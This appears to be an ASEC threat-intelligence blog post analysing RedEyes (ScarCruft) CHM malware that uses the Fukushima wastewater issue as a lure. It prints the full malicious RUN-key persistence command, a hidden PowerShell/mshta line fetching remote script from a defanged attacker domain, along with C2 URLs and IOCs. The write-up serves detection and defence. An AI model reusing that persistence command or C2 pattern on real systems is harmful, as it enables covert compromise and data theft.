RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release

The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] stage in the attack process of the RedEyes group’s M2RAT malware’.

The recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in Figure 1.

Figure 1. CHM malware containing information regarding the Fukushima wastewater release

Figure 2 shows the malicious script that operates during this process. The mshta command used to be executed directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key enabling it to be run when the system reboots.

Figure 2. Malicious script within the CHM

• RUN key registration
  Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Value name: fGZtm
  Value: c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

When the command registered to the RUN key is executed, an additional script at a certain URL runs through mshta. The said URL contains a JavaScript (JS) code. This code is responsible for executing an encoded PowerShell command. This process is similar in structure to the commands used in the attack process of previously covered CHM malware and M2RAT malware.

Figure 3. 4.html code

The decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results. It receives commands from the threat actor’s server, and according to the commands, can perform various malicious behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.

• C2
  • hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] // Receive the threat actor’s command
  • hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the command execution results

Figure 4. Decoded PowerShell command

Figure 5. Receiving commands

When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading additional files and breaching data according to the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Downloader/CHM.Generic (2023.09.02.00)

[IOC]
52f71fadf0ea5ffacd753e83a3d0af1a
hxxp://navercorp[.]ru/dashboard/image/202302/4.html
hxxp://navercorp[.]ru/dashboard/image/202302/com.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release appeared first on ASEC BLOG.

Article Link: RedEyes (ScarCruft)'s CHM Malware Using the Topic of Fukushima Wastewater Release - ASEC BLOG